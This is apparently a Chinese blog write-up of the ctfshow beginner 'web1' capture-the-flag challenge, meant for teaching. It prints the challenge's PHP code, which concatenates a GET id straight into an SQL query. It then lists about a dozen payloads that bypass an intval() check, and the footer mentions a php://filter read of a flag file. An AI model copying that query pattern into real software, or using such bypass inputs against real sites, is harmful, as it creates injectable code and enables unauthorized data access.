【CTFWP】ctfshow-萌新-web1-7

最新推荐文章于 2024-10-23 16:30:48 发布
最新推荐文章于 2024-10-23 16:30:48 发布
阅读量791 收藏 7
点赞数 17
分类专栏: CTF 文章标签: 网络安全 渗透测试 sql 安全 ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/LongL_GuYu/article/details/140628495
版权

文章目录

题目介绍

ctfshow-萌新计划-web1-web7

<html>
<head>
    <title>ctf.show萌新计划web1</title>
    <meta charset="utf-8">
</head>
<body>
<?php
# 包含数据库连接文件
include("config.php");
# 判断get提交的参数id是否存在
if(isset($_GET['id'])){
    $id = $_GET['id'];
    # 判断id的值是否大于999
    if(intval($id) > 999){
        # id 大于 999 直接退出并返回错误
        die("id error");
    }else{
        # id 小于 999 拼接sql语句
        $sql = "select * from article where id = $id order by id limit 1 ";
        echo "执行的sql为:$sql<br>";
        # 执行sql 语句
        $result = $conn->query($sql);
        # 判断有没有查询结果
        if ($result->num_rows > 0) {
            # 如果有结果,获取结果对象的值$row
            while($row = $result->fetch_assoc()) {
                echo "id: " . $row["id"]. " - title: " . $row["title"]. " <br><hr>" . $row["content"]. "<br>";
            }
        }
        # 关闭数据库连接
        $conn->close();
    }
    
}else{
    highlight_file(__FILE__);
}

?>
</body>
<!-- flag in id = 1000 -->
</html>

题目分析

  • 执行的sql为:select * from article where id = 1 order by id limit 1

  • 当id等于1000时,输出flag。

  • 但是get提交的参数id 大于 999 直接退出并返回错误

  • id 小于 999 拼接sql语句,并执行

payload

?id=2*500

?id=500/0.5

?id=round(999.9)

?id=power(10,3)

?id=‘1000%’

?id=!!1000

?id=0x3E8

?id=/**/1000

?id=~~1000

?id=0000|1000

?id=0000%5E1000

?id=‘1000’

?id=0b1111101000

……

本地测评代码

<?php
if(isset($_GET['id'])){
    $id = $_GET['id'];
    if(intval($id) > 999){
        echo "大于999,$id<br>";
        $a = intval($id);
        echo "大于999,$a<br>";
        die("id error");
    }else{
        echo "小于999,$id<br>";
        $a = intval($id);
        echo "小于999,$a<br>";
    }
}else{
    highlight_file(__FILE__);
}
?>

此后如竟没有炬火,我便是唯一的光。

ctfshow-(持续更
i_kei的博客
01-10 1万+
认证 加入qq群:372619038 进群喊:_密码1 密文: 53316C6B5A6A42684D3256695A44566A4E47526A4D5459774C5556375A6D49324D32566C4D4449354F4749345A6A526B4F48303D 首先16进制转字符 发现一串base64编码的字符串,解密后得到栅栏加密的字符串 base64加密解密 栅栏解密后得到flag _密码2 出题人已累,随便敲了几下键盘。。。 rdcvbg 2qase3 6tgh
ctfshow-web入门-爆破wp
m0_53567065的博客
11-01 1260
ctfshow-web入门-爆破wp
ctfshow-web
wangzhemvp的博客
10-09 513
spring漏洞pyload:1.发现git2.工具得到.git文件addslashes函数:在预定义的字符前面加上反斜杠%1$的作用就是防止 ' 被过滤掉输入?在Cookie里发现file,,为flag.txt把Cookie中的file赋值为,注这里抓包是响应页面的包。
CTF show题系列
12-22
题目地址:https://ctf.show 0X01 _密码1 1.16进制转字符串 有很多网站可以实现,这里我也附上我的脚本: # author: 羽 def hex_to_str(): while True: s = input("输入要转成字符串的16进制(输入空字符串退出):") if s=='': break k='' try: for i in range(0,len(s),2): j = s[i]+s[i+1]
ctfshow web系列--1
qq_61632010的博客
08-25 866
打开靶机 <html> <head> <title>ctf.show计划web1</title> <meta charset="utf-8"> </head> <body> <?php # 包含数据库连接文件 include("config.php"); # 判断get提交的参数id...
CTFShowweb1
weixin_64089259的博客
04-14 1270
第一次做web1题目,刚开始一脸懵逼,看了大佬的一些博客,才做出来,心里非常激动!
ctfshow 入门1
m0_73809176的博客
12-06 442
ctfshow 入门1
ctfshow-VIP题目-Web-详细解题思路
01-27
CTFSHOW-VIP题目-Web-详细解题思路 本文档总结了CTFSHOW-VIP题目-Web的详细解题思路,涵盖了多个Web安全领域的知识点,包括WP源码泄露、协议头信息泄露、robots后台泄露、phps源码泄露、源码压缩包泄露、版本控制...
CTFShow-WEB入门篇命令执行详细Wp(29-40)_ctfshow-web入门篇详细wp
2401_84281698的博客
05-12 1049
c=php://filter/read=convert.base64-encode/resource=flag.php #这里过滤了flag不要使用这一条没用 我只是都想测一遍用下面两个。对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。php://filter/read=convert.base64-encode/resource=flag.php #伪协议。
ctfshow-web41~60-WP
02-21
### CTFShow Web挑战41~60:深入解析与实战技巧 #### 挑战概述 CTFShow是一个提供多样化的网络安全挑战题目的平台,其中包含了大量的Web安全题目供参与者学习与实践。本篇文章主要关注的是CTFShow中的Web挑战第41...
CTFShow-Web篇详细wp(持续更中ing)_ctfshow web wp
2401_84297944的博客
04-28 503
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。因篇幅有限,仅展示部分资料。
ctfshow web
最新发布
2401_83504183的博客
10-23 1008
1)说明:这关的知识点和上一关是一样的php中的intval()函数绕过。(1)说明:这关的知识点和上一关是一样的php中的intval()函数绕过。(1)说明:这关的知识点和上一关是一样的php中的intval()函数绕过。(1)说明:这关的知识点和上一关是一样的php中的intval()函数绕过。(1)说明:这关的知识点和上一关是一样的php中的intval()函数绕过。(1)知识点1:php中的intval()函数。(1)知识点:依然是“php中的命令执行函数”
ctfshow--web1( 利用intval函数的特性获取敏感数据)
热门推荐
wangyuxiang946的博客
09-08 1万+
ctf.show 模块的web1关, 这一关考察的是intval()函数转换字符串时的特性以及SQL的拼接绕过 这一关直接就给了源码, 并提示我们 id = 1000 时, 就是flag 先分析一下源码, 首先是 intval()函数将参数id转换为数值型, id > 999直接die()结束程序, 也就是说我们传递的id不能大于 999, 明知道1000就是flag, 但不能直接传1000, 否则程序会直接die()结束, 传递的id 即不能大于999, 又需要查询 1...
CTFshow web1
weixin_44833249的博客
06-15 488
ctf.show计划web1
CTFshow_(杂项)
果粒程
12-18 1082
CTFshow_(杂项)
ctfshow
qq_62262904的博客
04-20 794
打开16进制编辑器,可以看到是010的汉化版,建十六进制文件,Ctrl+Shift+v,就可以将密文导入了。工具里面提供了 栅栏密码加解密工具和16进制编辑器,再看下密码,可以猜测是16进制串。看到最后的=号,猜测是base系列加密,先尝试base64,然后得到以下字符串。提交格式:KEY{XXXXXXXXXXXXXX}然后打开栅栏加解密工具,尝试解密。
ctfshowweb
qq_44657899的博客
08-17 3956
文章目录web_给她 web_给她 首先由题目给她可以联想出git源码泄露。 得到的源码如下: <?php $pass=sprintf("and pass='%s'",addslashes($_GET['pass'])); $sql=sprintf("select * from user where name='%s' $pass",addslashes($_GET['name'])); ?> 这里有个sprintf()函数没有看到过,搜了搜它的作用和漏洞,看到一个和本题很像的例子
ctfshow之_web9至web10
XiaoXiao_RenHe的专栏
05-09 777
ctfshow之_web9至web10
CTFSHOW 计划web9-15
羽的博客
04-03 2731
题目地址:http://ctf.show 0x01 web9 乍一看别被迷惑了,这个正则是字符串中包含 system、exec、highlight才能执行eval()。 if(preg_match("/system|exec|highlight/i",$c)){ eval($c); } 所以很简单,直接 c=highlight_file('conf...
CTF挑战:WP1-ctfshow解题攻略
"WP1-ctfshow" 这篇文章主要介绍了CTF(Capture The Flag)比赛中的若干种解题技巧,特别是针对网络安全Web安全领域的一些基本技术。CTF比赛通常涉及网络安全、逆向工程、密码学等多个领域,而这里的讨论集中在...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值